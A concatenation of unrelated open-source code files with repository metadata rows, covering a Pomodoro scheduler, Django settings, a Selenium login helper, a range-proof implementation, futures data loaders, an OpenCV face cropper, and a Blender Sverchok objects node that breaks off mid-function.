def pomodori_segments(self, group_length=4):
"""
Generate Pomodori along with the short and long breaks in between.
Credit: http://codereview.stackexchange.com/questions/53970
"""
# every fourth Pomodori precedes a long break,
# all others have short breaks following them
return cycle(
['pomodoro', 'short-break'] * (group_length - 1) + ['pomodoro', 'long-break'],
)
def pomodori_schedule(self):
"""
Returns a Pomodori schedule, which is a dict that contains a
list of Pomodori segments (Pomodoro, short break or long
break) in chronological order.
Credit: http://codereview.stackexchange.com/questions/53970
"""
available_time = self.total_seconds
segments = []
# make sure we have enough time for at least one Pomodoro
if available_time < self.pomodoro_length_seconds:
return
for i, segment_name in enumerate(self.pomodori_segments(self.group_length)):
segment = self._get_item(available_time, segment_name, i + 1)
if self.amount_mode and segment['pomodori-index'] > self.amount:
break
elif segment['length'] > available_time:
break
available_time -= segment['length']
segments.append(segment)
if segments and segments[-1]['type'].endswith('break'):
segments.pop()
work_segments = [seg for seg in segments if seg['type'] == 'pomodoro']
rest_segments = [seg for seg in segments if seg['type'].endswith('break')]
return {
'segments': segments,
'start': self.start,
'end': segments[-1]['end'],
'seconds-per-pomodoro': self.pomodoro_length_seconds,
'total-pomodori': len(work_segments),
'total-breaks': len(rest_segments),
'total-rest-time': sum(seg['length'] for seg in rest_segments),
'total-work-time': sum(seg['length'] for seg in work_segments),
}
def humanise_seconds(seconds):
"""
Takes `seconds` as an integer and returns a human readable
string, e.g. "2 hours, 5 minutes".
"""
units = []
unit_table = [('hour', 3600), ('minute', 60)]
for unit in unit_table:
quotient, seconds = divmod(seconds, unit[1])
if quotient:
units.append(
'{} {}'.format(
quotient,
unit[0] + ('s' if quotient > 1 else ''),
)
)
return ', '.join(units)
|
mit
| 6,045,448,055,413,695,000
| 30.317708
| 90
| 0.557126
| false
| 3.979484
| false
| false
| false
|
colour-science/colour-branding
|
utilities/colour.py
|
1
|
1033
|
import maya.cmds as cmds
import numpy as np
spectrum = np.load(
r"D:\Documents\Personal\Graphics\Colour\spectrum.npy")[:, 35:325, :]
materials = [u'mia_material_x01', u'mia_material_x02', u'mia_material_x03',
u'mia_material_x04', u'mia_material_x05', u'mia_material_x06',
u'mia_material_x07', u'mia_material_x08', u'mia_material_x09',
u'mia_material_x10', u'mia_material_x11', u'mia_material_x12', ]
samples = np.linspace(0, 1, len(materials))
for i, material in enumerate(materials):
R = np.interp(samples[i], np.linspace(0, 1, spectrum.shape[1]),
spectrum[..., 0][0])
G = np.interp(samples[i], np.linspace(0, 1, spectrum.shape[1]),
spectrum[..., 1][0])
B = np.interp(samples[i], np.linspace(0, 1, spectrum.shape[1]),
spectrum[..., 2][0])
# m = max(R, G, B)
m = 1
cmds.setAttr('{0}.diffuse'.format(material),
R / m, G / m, B / m,
type='double3')
|
bsd-3-clause
| 428,703,372,718,615,200
| 37.730769
| 77
| 0.549855
| false
| 3.074405
| false
| false
| false
|
alainrinder/quoridor.py
|
src/GridCoordinates.py
|
1
|
2281
|
#
# GridCoordinates.py
#
# @author Alain Rinder
# @date 2017.06.02
# @version 0.1
#
class GridCoordinates:
"""
Coordinates on square grid
"""
def __init__(self, col, row):
self.col = col
self.row = row
def left(self):
"""
Return the coordinates of the square at left, even if it does not exists
"""
return GridCoordinates(self.col - 1, self.row)
def right(self):
"""
Return the coordinates of the square at right, even if it does not exists
"""
return GridCoordinates(self.col + 1, self.row)
def top(self):
"""
Return the coordinates of the square at top, even if it does not exists
"""
return GridCoordinates(self.col, self.row - 1)
def bottom(self):
"""
Return the coordinates of the square at bottom, even if it does not exists
"""
return GridCoordinates(self.col, self.row + 1)
def clone(self):
"""
Return identical coordinates
"""
return GridCoordinates(self.col, self.row)
def __eq__(self, other):
"""
Override the default Equals behavior.
https://stackoverflow.com/questions/390250/elegant-ways-to-support-equivalence-equality-in-python-classes
"""
if isinstance(other, self.__class__):
#return self.__dict__ == other.__dict__
return self.col == other.col and self.row == other.row
return NotImplemented
def __ne__(self, other):
"""
Define a non-equality test.
https://stackoverflow.com/questions/390250/elegant-ways-to-support-equivalence-equality-in-python-classes
"""
if isinstance(other, self.__class__):
return not self.__eq__(other)
return NotImplemented
def __hash__(self):
"""
Override the default hash behavior (that returns the id or the object).
https://stackoverflow.com/questions/390250/elegant-ways-to-support-equivalence-equality-in-python-classes
"""
return hash((self.col, self.row))
def __str__(self):
return "%d,%d" % (self.col, self.row)
|
mit
| 4,232,492,451,206,281,700
| 26.873418
| 113
| 0.562034
| false
| 4.147273
| false
| false
| false
|
brunofin/coinvalue
|
backend/backend/settings.py
|
1
|
2626
|
# -*- coding: utf-8 -*-
"""
Django settings for backend project.
Generated by 'django-admin startproject' using Django 1.8.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'flny4$zxzcc-sno24n6m35=xg($c^&q*mil_31v#99cbj(^iw$'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'corsheaders',
'currency',
'apiv1',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'backend.urls'
CORS_ORIGIN_ALLOW_ALL = True
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'backend.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'CET'
USE_I18N = True
USE_L10N = True
USE_TZ = True
|
gpl-3.0
| -8,834,992,552,321,021,000
| 24.504854
| 71
| 0.686976
| false
| 3.473545
| false
| false
| false
|
Coriolan8/python_traning
|
fixture/session.py
|
1
|
1518
|
__author__ = "yulya"
class SessionHelper:
def __init__(self, app):
self.app = app
def Login(self, username, password):
wd = self.app.wd
self.app.open_home_page()
wd.find_element_by_name("user").click()
wd.find_element_by_name("user").clear()
wd.find_element_by_name("user").send_keys(username)
wd.find_element_by_id("content").click()
wd.find_element_by_name("pass").click()
wd.find_element_by_name("pass").clear()
wd.find_element_by_name("pass").send_keys(password)
wd.find_element_by_xpath('input[type="submit"]').click()
def logout(self):
wd = self.app.wd
wd.find_element_by_link_text("Logout").click()
def is_logged_in(self):
wd = self.app.wd
return len(wd.find_element_by_link_text("Logout").click()) > 0
def is_logged_in_as(self, username):
wd = self.app.wd
return self.get_logged_user() == username
def get_logged_user(self):
wd = self.app.wd
return wd.find_element_by_xpath ("//dev/dev[1]/form/b").text[1:-1]
def ensure_logout(self):
wd = self.app.wd
if self.is_logged_in():
self.logout()
def ensure_login(self, username, password):
wd = self.app.wd
if self.is_logged_in():
if self.is_logged_in_as(username):
return
else:
self.logout()
self.login(username,password)
|
apache-2.0
| 7,454,230,980,946,180,000
| 28.211538
| 78
| 0.54809
| false
| 3.434389
| false
| false
| false
|
grmToolbox/grmpy
|
promotion/grmpy_tutorial/create_slides.py
|
1
|
1443
|
#!/usr/bin/env python
"""This module compiles the lecture notes."""
import argparse
import glob
import os
import shutil
import subprocess
def compile_single(is_update):
"""Compile a single lecture."""
for task in ["pdflatex", "bibtex", "pdflatex", "pdflatex"]:
cmd = [task, "main"]
subprocess.check_call(cmd)
if is_update:
shutil.copy(
"main.pdf", "../../distribution/" + os.getcwd().split("/")[-1] + ".pdf"
)
if __name__ == "__main__":
parser = argparse.ArgumentParser(" Create slides for lecture")
parser.add_argument(
"--update", action="store_true", dest="update", help="update public slides"
)
is_complete = "lectures" == os.getcwd().split("/")[-1]
is_update = parser.parse_args().update
if is_complete:
for dirname in glob.glob("0*"):
os.chdir(dirname)
compile_single(is_update)
os.chdir("../")
# I also want to have a complete deck of slides available. This is not intended
# for public distribution.
fnames = []
for fname in sorted(glob.glob("0*")):
fnames += [fname + "/main.pdf"]
cmd = "pdftk " + " ".join(fnames) + " cat output course_deck.pdf"
subprocess.check_call(cmd, shell=True)
if is_update:
shutil.copy("course_deck.pdf", "../distribution/course_deck.pdf")
else:
compile_single(is_update)
|
mit
| 3,772,548,930,021,324,300
| 27.294118
| 87
| 0.57727
| false
| 3.738342
| false
| false
| false
|
qstokkink/py-ipv8
|
ipv8/attestation/wallet/pengbaorange/boudot.py
|
1
|
4606
|
"""
Implementation of proofs for checking commitment equality and if a commitment is a square ("Efficient Proofs that a
Committed NumberLies in an Interval" by F. Boudot).
Modified for use with range proofs ("An efficient range proof scheme." by K. Peng and F. Bao).
"""
from binascii import hexlify
from math import ceil, log
from os import urandom
from struct import pack, unpack
from ..primitives.attestation import sha256_as_int
from ..primitives.structs import ipack, iunpack
from ..primitives.value import FP2Value
def secure_randint(nmin, nmax):
normalized_range = nmax - nmin
n = int(ceil(log(normalized_range, 2) / 8.0))
rbytes_int = int(hexlify(urandom(n)), 16)
return nmin + (rbytes_int % normalized_range)
def _sipack(*n):
if len(n) > 8:
raise RuntimeError("More than 8 values specified to _sipack")
sign_byte = 0
packed = b''
for i in n:
sign_byte = sign_byte << 1
sign_byte |= 1 if i < 0 else 0
packed = ipack(-i if i < 0 else i) + packed
return pack(">B", sign_byte) + packed
def _siunpack(buf, amount):
rem = buf[1:]
nums = []
sign_byte, = unpack(">B", buf[0:1])
while rem and len(nums) < amount:
unpacked, rem = iunpack(rem)
negative = sign_byte & 0x01
sign_byte = sign_byte >> 1
nums.append(-unpacked if negative else unpacked)
return reversed(nums), rem
class EL(object):
def __init__(self, c, D, D1, D2):
self.c = c
self.D = D
self.D1 = D1
self.D2 = D2
@classmethod
def create(cls, x, r1, r2, g1, h1, g2, h2, b, bitspace, t=80, l=40): # pylint: disable=R0913,R0914
maxrange_w = 2 ^ (l + t) * b - 1
maxrange_n = 2 ^ (l + t + bitspace) * g1.mod - 1
w = secure_randint(1, maxrange_w)
n1 = secure_randint(1, maxrange_n)
n2 = secure_randint(1, maxrange_n)
W1 = g1.intpow(w) * h1.intpow(n1)
W2 = g2.intpow(w) * h2.intpow(n2)
cW1 = (W1.wp_nominator() * W1.wp_denom_inverse()).normalize()
cW2 = (W2.wp_nominator() * W2.wp_denom_inverse()).normalize()
c = sha256_as_int(str(cW1.a).encode('utf-8') + str(cW1.b).encode('utf-8')
+ str(cW2.a).encode('utf-8') + str(cW2.b).encode('utf-8'))
D = w + c * x
D1 = n1 + c * r1
D2 = n2 + c * r2
return cls(c, D, D1, D2)
def check(self, g1, h1, g2, h2, y1, y2):
cW1 = g1.intpow(self.D) * h1.intpow(self.D1) * y1.intpow(-self.c)
cW2 = g2.intpow(self.D) * h2.intpow(self.D2) * y2.intpow(-self.c)
cW1 = (cW1.wp_nominator() * cW1.wp_denom_inverse()).normalize()
cW2 = (cW2.wp_nominator() * cW2.wp_denom_inverse()).normalize()
return self.c == sha256_as_int(str(cW1.a).encode('utf-8') + str(cW1.b).encode('utf-8')
+ str(cW2.a).encode('utf-8') + str(cW2.b).encode('utf-8'))
def serialize(self):
return _sipack(self.c, self.D, self.D1, self.D2)
@classmethod
def unserialize(cls, s):
unpacked, rem = _siunpack(s, 4)
return cls(*unpacked), rem
def __eq__(self, other):
if not isinstance(other, EL):
return False
return (self.c == other.c) and (self.D == other.D) and (self.D1 == other.D1) and (self.D2 == other.D2)
def __hash__(self):
return 6976
def __str__(self):
return 'EL<%d,%d,%d,%d>' % (self.c, self.D, self.D1, self.D2)
class SQR(object):
def __init__(self, F, el):
self.F = F
self.el = el
@classmethod
def create(cls, x, r1, g, h, b, bitspace):
r2 = secure_randint(-2 ^ bitspace * g.mod + 1, 2 ^ bitspace * g.mod - 1)
F = g.intpow(x) * h.intpow(r2)
r3 = r1 - r2 * x
return cls(F, EL.create(x, r2, r3, g, h, F, h, b, bitspace))
def check(self, g, h, y):
return self.el.check(g, h, self.F, h, self.F, y)
def serialize(self):
min_f = self.F.wp_compress()
return ipack(min_f.mod) + ipack(min_f.a) + ipack(min_f.b) + self.el.serialize()
@classmethod
def unserialize(cls, s):
rem = s
mod, rem = iunpack(rem)
Fa, rem = iunpack(rem)
Fb, rem = iunpack(rem)
el, rem = EL.unserialize(rem)
return cls(FP2Value(mod, Fa, Fb), el), rem
def __eq__(self, other):
if not isinstance(other, SQR):
return False
return (self.F == other.F) and (self.el == other.el)
def __hash__(self):
return 838182
def __str__(self):
return 'SQR<%s,%s>' % (str(self.F), str(self.el))
|
lgpl-3.0
| 3,775,615,382,115,306,500
| 31.43662
| 115
| 0.558402
| false
| 2.839704
| false
| false
| false
|
lamter/slaveo
|
loadhistory/futures.py
|
1
|
4133
|
# coding: utf-8
import pymongo
import pandas as pd
import datetime
try:
from .newbar import NewMinuteBar, NewDayBar
except SystemError:
pass
class LoadBase(object):
"""
导入期货历史数据
"""
def __init__(self, path, symbol):
"""
:param path: 数据路径
:param contract: 合约名
:return:
"""
self.symbol = symbol
self.client = pymongo.MongoClient("localhost", 27017)
self.data = self.load(path)
def __exit__(self, exc_type, exc_val, exc_tb):
if self.client:
# 关闭链接
self.client.close()
def load(self, path):
# 取得 actionDay, 有些 date 是 trade day ,夜盘问题
# self.get_action_day(None)
raise NotImplementedError
def get_action_day(self, df):
"""
将 Index 转为
:return:
"""
# 下午8点肯定收盘了
close_time = datetime.time(20)
def action_day(dt):
if dt.time() > close_time:
# 日期前移1天
return dt - datetime.timedelta(days=1)
else:
# 不变
return dt
df['datetime'] = df['datetime'].apply(action_day)
return df
def to_vnpy(self):
"""
导入到vnpy的数据库中
:return:
"""
raise NotImplementedError
class LoadTdxMinHis(LoadBase):
"""
从通达信的历史数据导入分钟
"""
def load(self, path):
df = pd.read_csv(
path,
# index_col='datetime',
names=['date', 'time', 'open', 'high', 'low', 'close', 'volume', 'position', 'settlement'],
parse_dates={'datetime': ["date", "time"]},
keep_date_col=True,
engine="python",
skip_footer=1,
encoding='gbk',
)
# 获得 action day
return self.get_action_day(df)
def to_vnpy(self, dbn_1min, dbn_5min, dbn_10min):
"""
导入到vnpy的数据库中
:return:
"""
self.to_vnpy_bar1(dbn_1min)
self.to_vnpy_bar5(dbn_5min)
self.to_vnpy_bar10(dbn_10min)
def to_vnpy_bar1(self, dbn_1min):
dbn_1min = self.client[dbn_1min]
db_bar1 = dbn_1min[self.symbol]
data = self.data
print(u"清空数据库%s" % db_bar1)
db_bar1.drop()
db_bar1.insert_many(data.to_dict('record'))
def to_vnpy_bar5(self, dbn_5min):
db_bar5 = self.client[dbn_5min][self.symbol]
data = self.data
# 转为5分钟K线
bar5 = NewMinuteBar(data, 5).new()
print(u"清空数据库%s" % db_bar5)
db_bar5.drop()
db_bar5.insert_many(bar5.to_dict('record'))
def to_vnpy_bar10(self, dbn_10min):
db_bar10 = self.client[dbn_10min][self.symbol]
data = self.data
# 转为10分钟K线
bar10 = NewMinuteBar(data, 10).new()
print(u"清空数据库%s" % db_bar10)
db_bar10.drop()
db_bar10.insert_many(bar10.to_dict('record'))
class LoadTdxDailyHis(LoadBase):
"""
从通达信的历史数据导入, 日线数据
"""
def load(self, path):
return pd.read_csv(
path,
# index_col='datetime',
names=['date', 'open', 'high', 'low', 'close', 'volume', 'position', 'settlement'],
parse_dates={'datetime': ["date"]},
keep_date_col=True,
engine="python",
skip_footer=1,
encoding='gbk',
)
def to_vnpy(self, dbn_1day):
"""
:return:
"""
self.to_vnpy_day_bar1(dbn_1day)
def to_vnpy_day_bar1(self, dbn_1day):
"""
分钟线计算收盘价是不准确的,因为有收盘价和结算价,有些结算价是收盘最后3分钟的平均价格
:return:
"""
self.db_day_bar1 = self.client["VnTrader_Daily_Db"][symbol]
db_day_bar1 = self.db_day_bar1
data = self.data
db_day_bar1.drop()
db_day_bar1.insert(data.to_dict('record'))
|
gpl-3.0
| -6,288,002,198,736,356,000
| 23.324841
| 103
| 0.515318
| false
| 2.820532
| false
| false
| false
|
PuercoPop/FaceRec
|
apps/WebUi/testhaar.py
|
1
|
1298
|
import cv
import os
from os.path import join
from django.conf import settings
def find_faces( img_url ):
cascade = cv.Load( join(settings.ROOT_DIR,'apps/WebUi/haarcascade_frontalface_alt.xml') )
directory= join(settings.MEDIA_ROOT , 'Uploads/')
target_directory = join( directory, 'Portraits/')
portrait_list = []
img = cv.LoadImage( directory + img_url)
imgGray = cv.CreateImage( cv.GetSize(img), img.depth , 1)
cv.CvtColor(img, imgGray, cv.CV_BGR2GRAY)
faces = cv.HaarDetectObjects( imgGray, cascade , cv.CreateMemStorage(),)
if len(faces)>0:
print "Detecto Algo"
else:
print "Miss"
for counter , ((x, y, w, h), n) in enumerate(faces):
cv.SetImageROI(img, (x,y,w,h ) )#Fija la region de interes
imgface = cv.CreateImage( cv.GetSize(img),img.depth,img.nChannels)
imgface_rsz = cv.CreateImage( (128,128) ,img.depth,img.nChannels)
cv.Copy(img,imgface)
cv.Resize(imgface, imgface_rsz, cv.CV_INTER_AREA)
cv.SaveImage( target_directory + str(img_url[:-4]) + "_" + str(counter ) +".png",imgface_rsz)
portrait_list.append( 'Uploads/Portraits/' + str(img_url[:-4]) + "_" + str(counter ) +".png")
cv.ResetImageROI(img)
return portrait_list
if __name__ == "__main__":
find_faces_dir( '../MockUpCode/Images/')
|
bsd-2-clause
| 2,583,801,675,626,725,000
| 30.658537
| 97
| 0.656394
| false
| 2.852747
| false
| false
| false
|
jessada/pyCMM
|
pycmm/cmmlib/intervarlib.py
|
1
|
2195
|
import re
RAW_INTERVAR_CLASS_BENIGN = "Benign"
RAW_INTERVAR_CLASS_LIKELY_BENIGN = "Likelybenign"
RAW_INTERVAR_CLASS_UNCERTAIN_SIGNIFICANCE = "UncertainSignificance"
RAW_INTERVAR_CLASS_LIKELY_PATHOGENIC = "Likelypathogenic"
RAW_INTERVAR_CLASS_PATHOGENIC = "Pathogenic"
INTERVAR_CLASS_BENIGN = "Benign"
INTERVAR_CLASS_LIKELY_BENIGN = "Likely Benign"
INTERVAR_CLASS_UNCERTAIN_SIGNIFICANCE = "Uncertain Significance"
INTERVAR_CLASS_LIKELY_PATHOGENIC = "Likely Pathogenic"
INTERVAR_CLASS_PATHOGENIC = "Pathogenic"
CLASSIFICATION_PATTERN = re.compile(r'''InterVar:(?P<acmg_class>.+?);''')
EVIDENCE_PATTERN = re.compile(r'''(?P<var_name>[a-zA-Z0-9]*?)=(?P<value>(?:[0-9]+?|\[[0-9;]*?\]))''')
def parse_intervar_class(raw_intervar):
class_match = CLASSIFICATION_PATTERN.match(raw_intervar)
if class_match is not None:
intervar_class = class_match.group('acmg_class')
if intervar_class == RAW_INTERVAR_CLASS_BENIGN:
return INTERVAR_CLASS_BENIGN
if intervar_class == RAW_INTERVAR_CLASS_LIKELY_BENIGN:
return INTERVAR_CLASS_LIKELY_BENIGN
if intervar_class == RAW_INTERVAR_CLASS_UNCERTAIN_SIGNIFICANCE:
return INTERVAR_CLASS_UNCERTAIN_SIGNIFICANCE
if intervar_class == RAW_INTERVAR_CLASS_LIKELY_PATHOGENIC:
return INTERVAR_CLASS_LIKELY_PATHOGENIC
if intervar_class == RAW_INTERVAR_CLASS_PATHOGENIC:
return INTERVAR_CLASS_PATHOGENIC
return ""
def evidence2str(raw_evidence):
evidence_list = []
for item in raw_evidence:
var_name = item[0]
value = eval(item[1].replace(';',','))
if type(value) is int and value == 1:
evidence_list.append(var_name)
elif type(value) is list:
for value_idx in xrange(len(value)):
var_name_val = value[value_idx]
if var_name_val == 1:
evidence_list.append(var_name+str(value_idx+1))
return ", ".join(evidence_list)
def parse_intervar_evidence(raw_intervar):
class_match = CLASSIFICATION_PATTERN.match(raw_intervar)
evidence_matchs = EVIDENCE_PATTERN.findall(raw_intervar, re.DOTALL)
return evidence2str(evidence_matchs)
|
gpl-2.0
| 5,027,679,920,982,609,000
| 41.211538
| 101
| 0.676538
| false
| 2.962213
| false
| false
| false
|
jamalmoir/ml_demo
|
libs/garden/xpopup/xbase.py
|
1
|
4736
|
"""
XBase class
============
Subclass of :class:`xpopup.XPopup`.
Base class for all popup extensions. Don't use this class directly.
Examples
--------
How to create your own class based on :class:`XBase`? It's easy!
The content of the popup should be implemented in the :meth:`XBase._get_body`::
class MyPopup(XBase):
def _get_body(self):
return Label(text='Hello World!')
popup = MyPopup()
By default, popup will automatically opened when the instance was created.
If you don't want that, you can set :attr:`auto_open` to False::
popup = MyPopup(auto_open=False)
If you want to add buttons to the popup, just use :attr:`buttons`::
popup = MyPopup(buttons=[MyPopup.BUTTON_OK, MyPopup.BUTTON_CANCEL])
Pressing the button will trigger the 'dismiss' event. The button that was
pressed, can be obtained from the :attr:`button_pressed`. You can use it
in your callback::
def my_callback(instance):
print('Button "', instance.button_pressed, '" was pressed.')
popup = MyPopup(auto_open=False, buttons=['Ok', 'Cancel'])
popup.bind(on_dismiss=my_callback)
popup.open()
If you include a XBase.BUTTON_CANCEL in your set of buttons, then you can
use :meth:`XBase.is_canceled` to check if it was pressed::
def my_callback(instance):
if instance.is_canceled():
print('Popup was canceled.')
else:
print('Button "', instance.button_pressed, '" was pressed.')
"""
from kivy import metrics
from kivy.factory import Factory
from kivy.properties import BooleanProperty, ListProperty, StringProperty,\
NumericProperty
from kivy.uix.boxlayout import BoxLayout
try:
from .tools import gettext_ as _
from .xpopup import XPopup
except:
from tools import gettext_ as _
from xpopup import XPopup
__author__ = 'ophermit'
class XBase(XPopup):
"""XBase class. See module documentation for more information.
"""
auto_open = BooleanProperty(True)
'''This property determines if the pop-up is automatically
opened when the instance was created. Otherwise use :meth:`XBase.open`
:attr:`auto_open` is a :class:`~kivy.properties.BooleanProperty` and
defaults to True.
'''
buttons = ListProperty()
'''List of button names. Can be used when using custom button sets.
:attr:`buttons` is a :class:`~kivy.properties.ListProperty` and defaults to
[].
'''
button_pressed = StringProperty('')
'''Name of button which has been pressed.
:attr:`button_pressed` is a :class:`~kivy.properties.StringProperty` and
defaults to '', read-only.
'''
size_hint_x = NumericProperty(.6, allownone=True)
size_hint_y = NumericProperty(.3, allownone=True)
auto_dismiss = BooleanProperty(False)
'''Overrides properties from :class:`~kivy.uix.popup.Popup`
'''
min_width = NumericProperty(metrics.dp(300), allownone=True)
min_height = NumericProperty(metrics.dp(150), allownone=True)
fit_to_window = BooleanProperty(True)
'''Overrides properties from :class:`XPopup`
'''
BUTTON_OK = _('Ok')
BUTTON_CANCEL = _('Cancel')
BUTTON_YES = _('Yes')
BUTTON_NO = _('No')
BUTTON_CLOSE = _('Close')
'''Basic button names
'''
def __init__(self, **kwargs):
# preventing change content of the popup
kwargs.pop('content', None)
self._pnl_buttons = None
super(XBase, self).__init__(**kwargs)
layout = BoxLayout(orientation="vertical")
layout.add_widget(self._get_body())
self._pnl_buttons = BoxLayout(size_hint_y=None)
layout.add_widget(self._pnl_buttons)
self.add_widget(layout)
# creating buttons panel
self.property('buttons').dispatch(self)
if self.auto_open:
self.open()
def _on_click(self, instance):
self.button_pressed = instance.id
self.dismiss()
def _get_body(self):
"""Returns the content of the popup. You need to implement
this in your subclass.
"""
raise NotImplementedError
def on_buttons(self, instance, buttons):
if self._pnl_buttons is None:
return
self._pnl_buttons.clear_widgets()
if len(buttons) == 0:
self._pnl_buttons.height = 0
return
self._pnl_buttons.height = metrics.dp(30)
for button in buttons:
self._pnl_buttons.add_widget(
Factory.XButton(
text=button, id=button, on_release=self._on_click))
def is_canceled(self):
"""Check the `cancel` event
:return: True, if the button 'Cancel' has been pressed
"""
return self.button_pressed == self.BUTTON_CANCEL
|
gpl-3.0
| 3,830,199,417,355,320,300
| 28.786164
| 79
| 0.641047
| false
| 3.878788
| false
| false
| false
|
DolphinDream/sverchok
|
nodes/scene/objects_mk3.py
|
1
|
12461
|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
import bpy
from bpy.props import BoolProperty, StringProperty
import bmesh
import sverchok
from sverchok.node_tree import SverchCustomTreeNode
from sverchok.utils.nodes_mixins.sv_animatable_nodes import SvAnimatableNode
from sverchok.data_structure import updateNode
from sverchok.utils.sv_bmesh_utils import pydata_from_bmesh
from sverchok.core.handlers import get_sv_depsgraph, set_sv_depsgraph_need
from sverchok.utils.nodes_mixins.show_3d_properties import Show3DProperties
class SvOB3BDataCollection(bpy.types.PropertyGroup):
name: bpy.props.StringProperty()
icon: bpy.props.StringProperty(default="BLANK1")
class SVOB3B_UL_NamesList(bpy.types.UIList):
def draw_item(self, context, layout, data, item, icon, active_data, active_propname, index):
item_icon = item.icon
if not item.icon or item.icon == "BLANK1":
try:
item_icon = 'OUTLINER_OB_' + bpy.data.objects[item.name].type
except:
item_icon = ""
layout.label(text=item.name, icon=item_icon)
action = data.wrapper_tracked_ui_draw_op(layout, "node.sv_ob3b_collection_operator", icon='X', text='')
action.fn_name = 'REMOVE'
action.idx = index
class SvOB3BItemOperator(bpy.types.Operator):
bl_idname = "node.sv_ob3b_collection_operator"
bl_label = "bladibla"
idname: bpy.props.StringProperty(name="node name", default='')
idtree: bpy.props.StringProperty(name="tree name", default='')
fn_name: bpy.props.StringProperty(default='')
idx: bpy.props.IntProperty()
def execute(self, context):
node = bpy.data.node_groups[self.idtree].nodes[self.idname]
if self.fn_name == 'REMOVE':
node.object_names.remove(self.idx)
node.process_node(None)
return {'FINISHED'}
class SvOB3Callback(bpy.types.Operator):
bl_idname = "node.ob3_callback"
bl_label = "Object In mk3 callback"
bl_options = {'INTERNAL'}
fn_name: StringProperty(default='')
idname: StringProperty(name="node name", default='')
idtree: StringProperty(name="tree name", default='')
def execute(self, context):
"""
returns the operator's 'self' too to allow the code being called to
print from self.report.
"""
if self.idtree and self.idname:
ng = bpy.data.node_groups[self.idtree]
node = ng.nodes[self.idname]
else:
node = context.node
getattr(node, self.fn_name)(self)
return {'FINISHED'}
class SvObjectsNodeMK3(Show3DProperties, bpy.types.Node, SverchCustomTreeNode, SvAnimatableNode):
"""
Triggers: obj Input Scene Objects pydata
Tooltip: Get Scene Objects into Sverchok Tree
"""
bl_idname = 'SvObjectsNodeMK3'
bl_label = 'Objects in'
bl_icon = 'OUTLINER_OB_EMPTY'
sv_icon = 'SV_OBJECTS_IN'
def hide_show_versgroups(self, context):
outs = self.outputs
showing_vg = 'Vers_grouped' in outs
if self.vergroups and not showing_vg:
outs.new('SvStringsSocket', 'Vers_grouped')
elif not self.vergroups and showing_vg:
outs.remove(outs['Vers_grouped'])
def modifiers_handle(self, context):
set_sv_depsgraph_need(self.modifiers)
updateNode(self, context)
groupname: StringProperty(
name='groupname', description='group of objects (green outline CTRL+G)',
default='', update=updateNode)
modifiers: BoolProperty(
name='Modifiers',
description='Apply modifier geometry to import (original untouched)',
default=False, update=modifiers_handle)
vergroups: BoolProperty(
name='Vergroups',
description='Use vertex groups to nesty insertion',
default=False, update=hide_show_versgroups)
sort: BoolProperty(
name='sort by name',
description='sorting inserted objects by names',
default=True, update=updateNode)
object_names: bpy.props.CollectionProperty(type=SvOB3BDataCollection, options={'SKIP_SAVE'})
active_obj_index: bpy.props.IntProperty()
def sv_init(self, context):
new = self.outputs.new
new('SvVerticesSocket', "Vertices")
new('SvStringsSocket', "Edges")
new('SvStringsSocket', "Polygons")
new('SvStringsSocket', "MaterialIdx")
new('SvMatrixSocket', "Matrixes")
new('SvObjectSocket', "Object")
def get_objects_from_scene(self, ops):
"""
Collect selected objects
"""
self.object_names.clear()
if self.groupname and groups[self.groupname].objects:
groups = bpy.data.groups
names = [obj.name for obj in groups[self.groupname].objects]
else:
names = [obj.name for obj in bpy.data.objects if (obj.select_get() and len(obj.users_scene) > 0 and len(obj.users_collection) > 0)]
if self.sort:
names.sort()
for name in names:
item = self.object_names.add()
item.name = name
item.icon = 'OUTLINER_OB_' + bpy.data.objects[name].type
if not self.object_names:
ops.report({'WARNING'}, "Warning, no selected objects in the scene")
return
self.process_node(None)
def select_objs(self, ops):
"""select all objects referenced by node"""
for item in self.object_names:
bpy.data.objects[item.name].select = True
if not self.object_names:
ops.report({'WARNING'}, "Warning, no object associated with the obj in Node")
def draw_obj_names(self, layout):
if self.object_names:
layout.template_list("SVOB3B_UL_NamesList", "", self, "object_names", self, "active_obj_index")
else:
